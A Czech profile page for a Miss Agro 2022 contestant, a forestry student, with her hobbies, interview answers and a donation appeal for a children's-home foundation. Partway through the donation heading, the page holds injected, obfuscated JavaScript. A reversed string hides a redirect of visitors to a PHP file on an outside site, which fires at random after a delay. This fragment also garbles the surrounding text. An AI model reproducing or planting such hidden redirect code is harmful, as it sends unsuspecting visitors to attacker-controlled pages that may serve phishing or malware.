Gabriela Hamouzová

Profil

Fotografie

Fakulta: FLD
Obor: Lesnictví
Ročník: 3.
Věk:
23

Gabriela je přátelská a vřelá. Dokonalost je pro ni důležitá, žádný detail ji neunikne. Především má ráda přírodu, les. Ve svém volném čase se věnuje myslivosti, střelectví, hraní na borlici, kynologii, mysliveckým spolkům, cestování a módě. Nejvíce času tráví se svým psem. Podporuje svoji milující rodinu a přátelé.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2022?

Hlavně si to jdu užít. Poznat nový kolektiv. Všechny by se měly stát Miss.

Kdybys v soutěži vyhrála dovolenou snů, jak bys chtěla, aby vypadala?

Prohlédnout si místa, kam se jen tak nikdo nedostane. Poznat novou kulturu a zvyky. A hlavně, aby tam bylo spoustu dobrého jídla.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Tato univerzita je nejlepší v ČR, hlavně v oborech zabývajících se přírodou. Fakulta lesnická a dřevařská má nejvíce možností, jak využít můj obor – Lesnictví. Rozšíří nám obzory v našem budoucím zaměstnání. Každý si může vybrat, co ho baví i v mimoškolních aktivitách (sport, spolky,…).